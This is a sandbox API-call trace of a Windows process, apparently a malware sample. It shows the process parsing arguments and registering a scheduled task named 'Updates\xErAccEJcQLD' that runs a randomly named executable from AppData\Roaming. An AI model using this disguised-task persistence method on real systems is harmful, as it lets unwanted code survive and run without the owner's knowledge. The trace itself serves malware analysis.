[0193.578] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4
[0193.579] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.579] lstrlenW (lpString="|mo|") returned 4
[0193.579] lstrlenW (lpString="|XML|") returned 5
[0193.579] RtlRestoreLastWin32Error () returned 0x490
[0193.579] lstrlenW (lpString="d") returned 1
[0193.579] lstrlenW (lpString="d") returned 1
[0193.579] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] lstrlenW (lpString="XML") returned 3
[0193.579] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3
[0193.579] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.579] lstrlenW (lpString="|d|") returned 3
[0193.579] lstrlenW (lpString="|XML|") returned 5
[0193.579] RtlRestoreLastWin32Error () returned 0x490
[0193.579] lstrlenW (lpString="m") returned 1
[0193.579] lstrlenW (lpString="m") returned 1
[0193.579] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] lstrlenW (lpString="XML") returned 3
[0193.579] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3
[0193.579] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.579] lstrlenW (lpString="|m|") returned 3
[0193.579] lstrlenW (lpString="|XML|") returned 5
[0193.579] RtlRestoreLastWin32Error () returned 0x490
[0193.579] lstrlenW (lpString="i") returned 1
[0193.579] lstrlenW (lpString="i") returned 1
[0193.579] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] lstrlenW (lpString="XML") returned 3
[0193.579] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3
[0193.580] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.580] lstrlenW (lpString="|i|") returned 3
[0193.580] lstrlenW (lpString="|XML|") returned 5
[0193.580] RtlRestoreLastWin32Error () returned 0x490
[0193.580] lstrlenW (lpString="tn") returned 2
[0193.580] lstrlenW (lpString="tn") returned 2
[0193.580] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.580] lstrlenW (lpString="XML") returned 3
[0193.580] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.580] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4
[0193.580] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.580] lstrlenW (lpString="|tn|") returned 4
[0193.580] lstrlenW (lpString="|XML|") returned 5
[0193.580] RtlRestoreLastWin32Error () returned 0x490
[0193.580] lstrlenW (lpString="tr") returned 2
[0193.580] lstrlenW (lpString="tr") returned 2
[0193.580] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.580] lstrlenW (lpString="XML") returned 3
[0193.580] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.580] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4
[0193.580] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.580] lstrlenW (lpString="|tr|") returned 4
[0193.580] lstrlenW (lpString="|XML|") returned 5
[0193.580] RtlRestoreLastWin32Error () returned 0x490
[0193.580] lstrlenW (lpString="st") returned 2
[0193.580] lstrlenW (lpString="st") returned 2
[0193.580] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.581] lstrlenW (lpString="XML") returned 3
[0193.581] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.581] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|st|") returned 4
[0193.581] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.581] lstrlenW (lpString="|st|") returned 4
[0193.581] lstrlenW (lpString="|XML|") returned 5
[0193.581] RtlRestoreLastWin32Error () returned 0x490
[0193.581] lstrlenW (lpString="sd") returned 2
[0193.581] lstrlenW (lpString="sd") returned 2
[0193.581] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.585] lstrlenW (lpString="XML") returned 3
[0193.585] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.585] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sd|") returned 4
[0193.585] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.585] lstrlenW (lpString="|sd|") returned 4
[0193.585] lstrlenW (lpString="|XML|") returned 5
[0193.585] RtlRestoreLastWin32Error () returned 0x490
[0193.586] lstrlenW (lpString="ed") returned 2
[0193.586] lstrlenW (lpString="ed") returned 2
[0193.586] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] lstrlenW (lpString="XML") returned 3
[0193.586] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ed|") returned 4
[0193.586] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.586] lstrlenW (lpString="|ed|") returned 4
[0193.586] lstrlenW (lpString="|XML|") returned 5
[0193.586] RtlRestoreLastWin32Error () returned 0x490
[0193.586] lstrlenW (lpString="it") returned 2
[0193.586] lstrlenW (lpString="it") returned 2
[0193.586] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] lstrlenW (lpString="XML") returned 3
[0193.586] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|it|") returned 4
[0193.586] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.586] lstrlenW (lpString="|it|") returned 4
[0193.586] lstrlenW (lpString="|XML|") returned 5
[0193.586] RtlRestoreLastWin32Error () returned 0x490
[0193.586] lstrlenW (lpString="et") returned 2
[0193.586] lstrlenW (lpString="et") returned 2
[0193.586] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] lstrlenW (lpString="XML") returned 3
[0193.586] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|et|") returned 4
[0193.586] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.586] lstrlenW (lpString="|et|") returned 4
[0193.586] lstrlenW (lpString="|XML|") returned 5
[0193.586] RtlRestoreLastWin32Error () returned 0x490
[0193.587] lstrlenW (lpString="k") returned 1
[0193.587] lstrlenW (lpString="k") returned 1
[0193.587] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.587] lstrlenW (lpString="XML") returned 3
[0193.587] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.587] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|k|") returned 3
[0193.587] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.587] lstrlenW (lpString="|k|") returned 3
[0193.587] lstrlenW (lpString="|XML|") returned 5
[0193.587] RtlRestoreLastWin32Error () returned 0x490
[0193.587] lstrlenW (lpString="du") returned 2
[0193.587] lstrlenW (lpString="du") returned 2
[0193.596] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.596] lstrlenW (lpString="XML") returned 3
[0193.596] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.596] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|du|") returned 4
[0193.596] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.596] lstrlenW (lpString="|du|") returned 4
[0193.596] lstrlenW (lpString="|XML|") returned 5
[0193.596] RtlRestoreLastWin32Error () returned 0x490
[0193.596] lstrlenW (lpString="ri") returned 2
[0193.596] lstrlenW (lpString="ri") returned 2
[0193.596] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.596] lstrlenW (lpString="XML") returned 3
[0193.596] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.596] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ri|") returned 4
[0193.597] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.597] lstrlenW (lpString="|ri|") returned 4
[0193.597] lstrlenW (lpString="|XML|") returned 5
[0193.597] RtlRestoreLastWin32Error () returned 0x490
[0193.597] lstrlenW (lpString="z") returned 1
[0193.597] lstrlenW (lpString="z") returned 1
[0193.597] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] lstrlenW (lpString="XML") returned 3
[0193.597] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|z|") returned 3
[0193.597] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.597] lstrlenW (lpString="|z|") returned 3
[0193.597] lstrlenW (lpString="|XML|") returned 5
[0193.597] RtlRestoreLastWin32Error () returned 0x490
[0193.597] lstrlenW (lpString="f") returned 1
[0193.597] lstrlenW (lpString="f") returned 1
[0193.597] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] lstrlenW (lpString="XML") returned 3
[0193.597] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3
[0193.597] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.597] lstrlenW (lpString="|f|") returned 3
[0193.597] lstrlenW (lpString="|XML|") returned 5
[0193.597] RtlRestoreLastWin32Error () returned 0x490
[0193.597] lstrlenW (lpString="v1") returned 2
[0193.597] lstrlenW (lpString="v1") returned 2
[0193.597] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] lstrlenW (lpString="XML") returned 3
[0193.598] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.598] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|v1|") returned 4
[0193.598] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.598] lstrlenW (lpString="|v1|") returned 4
[0193.598] lstrlenW (lpString="|XML|") returned 5
[0193.598] RtlRestoreLastWin32Error () returned 0x490
[0193.598] lstrlenW (lpString="xml") returned 3
[0193.598] lstrlenW (lpString="xml") returned 3
[0193.598] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.598] lstrlenW (lpString="XML") returned 3
[0193.598] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.598] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|xml|") returned 5
[0193.598] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.598] lstrlenW (lpString="|xml|") returned 5
[0193.598] lstrlenW (lpString="|XML|") returned 5
[0193.598] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|"
[0193.598] RtlRestoreLastWin32Error () returned 0x0
[0193.598] RtlRestoreLastWin32Error () returned 0x0
[0193.598] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.598] lstrlenW (lpString="-/") returned 2
[0193.598] StrChrIW (lpStart="-/", wMatch=0x4a30043) returned 0x0
[0193.598] RtlRestoreLastWin32Error () returned 0x490
[0193.598] RtlRestoreLastWin32Error () returned 0x490
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp"
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] _memicmp (_Buf1=0x47774b0, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.599] _memicmp (_Buf1=0x477aaa8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.599] RtlRestoreLastWin32Error () returned 0x7a
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] lstrlenW (lpString="C") returned 1
[0193.599] RtlRestoreLastWin32Error () returned 0x490
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] GetProcessHeap () returned 0x4770000
[0193.599] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x6a) returned 0x477ae20
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] GetProcessHeap () returned 0x4770000
[0193.599] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x1fc) returned 0x4779db8
[0193.600] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0193.607] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0193.624] CoCreateInstance (in: rclsid=0x3a26c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x3a26d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdd39c | out: ppv=0xdd39c*=0x4a33758) returned 0x0
[0194.208] TaskScheduler:ITaskService:Connect (This=0x4a33758, serverName=0xdd34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xdd35c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xdd36c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd37c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
[0194.217] TaskScheduler:ITaskService:GetFolder (in: This=0x4a33758, Path=0x0, ppFolder=0xdd464 | out: ppFolder=0xdd464*=0x4a33880) returned 0x0
[0194.220] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp2010.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x128
[0194.221] GetFileSizeEx (in: hFile=0x128, lpFileSize=0xdcd7c | out: lpFileSize=0xdcd7c*=1646) returned 1
[0194.221] ReadFile (in: hFile=0x128, lpBuffer=0xdcd8c, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0xdcd88, lpOverlapped=0x0 | out: lpBuffer=0xdcd8c*, lpNumberOfBytesRead=0xdcd88*=0x2, lpOverlapped=0x0) returned 1
[0194.221] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0194.221] malloc (_Size=0x66f) returned 0x4a338d0
[0194.222] ReadFile (in: hFile=0x128, lpBuffer=0x4a338d0, nNumberOfBytesToRead=0x66f, lpNumberOfBytesRead=0xdcd88, lpOverlapped=0x0 | out: lpBuffer=0x4a338d0*, lpNumberOfBytesRead=0xdcd88*=0x66e, lpOverlapped=0x0) returned 1
[0194.222] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x4a338d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1647
[0194.222] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x4a338d0, cbMultiByte=-1, lpWideCharStr=0x478a74c, cchWideChar=1647 | out: lpWideCharStr="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe\r\n \r\n \r\n") returned 1647
[0194.222] SysStringLen (param_1="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe\r\n \r\n \r\n") returned 0x66e
[0194.222] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe\r\n \r\n \r\n", pbstrResult=0xdcd2c | out: pbstrResult=0xdcd2c) returned 0x0
[0194.222] free (_Block=0x4a338d0)
[0194.222] CloseHandle (hObject=0x128) returned 1
[0194.223] lstrlenW (lpString="") returned 0
[0194.224] malloc (_Size=0xc) returned 0x4a33830
[0194.224] SysStringLen (param_1="") returned 0x0
[0194.224] free (_Block=0x4a33830)
[0194.224] lstrlenW (lpString="") returned 0
[0194.224] ITaskFolder:RegisterTask (in: This=0x4a33880, Path="Updates\\xErAccEJcQLD", XmlText="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe\r\n \r\n \r\n", flags=2, UserId=0xdcd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), password=0xdcd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=0, sddl=0xdcd84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xdcde0 | out: ppTask=0xdcde0*=0x4a33908) returned 0x0
[0195.475] GetProcessHeap () returned 0x4770000
[0195.475] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4781e50
[0195.475] _memicmp (_Buf1=0x4777468, _Buf2=0x3a2708, _Size=0x7) returned 0
[0195.475] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x477a798, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0195.475] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0195.475] GetProcessHeap () returned 0x4770000
[0195.475] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x82) returned 0x47892c0
[0195.475] _vsnwprintf (in: _Buffer=0xdcdf8, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xdcd94 | out: _Buffer="SUCCESS: The scheduled task \"Updates\\xErAccEJcQLD\" has successfully been created.\n") returned 82
[0195.475] __iob_func () returned 0x74341208
[0195.476] _fileno (_File=0x74341228) returned 1
[0195.476] _errno () returned 0x4a305b0
[0195.476] _get_osfhandle (_FileHandle=1) returned 0x3c
[0195.476] _errno () returned 0x4a305b0
[0195.476] GetFileType (hFile=0x3c) returned 0x2
[0195.476] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c
[0195.476] GetFileType (hFile=0x3c) returned 0x2
[0195.476] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdcd68 | out: lpMode=0xdcd68) returned 1
[0195.477] __iob_func () returned 0x74341208
[0195.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c
[0195.477] lstrlenW (lpString="SUCCESS: The scheduled task \"Updates\\xErAccEJcQLD\" has successfully been created.\n") returned 82
[0195.477] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdcdf8*, nNumberOfCharsToWrite=0x52, lpNumberOfCharsWritten=0xdcd8c, lpReserved=0x0 | out: lpBuffer=0xdcdf8*, lpNumberOfCharsWritten=0xdcd8c*=0x52) returned 1
[0195.482] IUnknown:Release (This=0x4a33908) returned 0x0
[0195.482] TaskScheduler:IUnknown:Release (This=0x4a33880) returned 0x0
[0195.482] TaskScheduler:IUnknown:Release (This=0x4a33758) returned 0x0
[0195.482] lstrlenW (lpString="") returned 0
[0195.482] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0195.482] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53
[0195.482] GetProcessHeap () returned 0x4770000
[0195.482] GetProcessHeap () returned 0x4770000
[0195.482] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779db8) returned 1
[0195.482] GetProcessHeap () returned 0x4770000
[0195.482] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779db8) returned 0x1fc
[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779db8) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477ae20) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477ae20) returned 0x6a
[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477ae20) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779628) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779628) returned 0x16
[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779628) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477ab20) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477ab20) returned 0x10
[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477ab20) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779488) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.483] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779488) returned 0x14
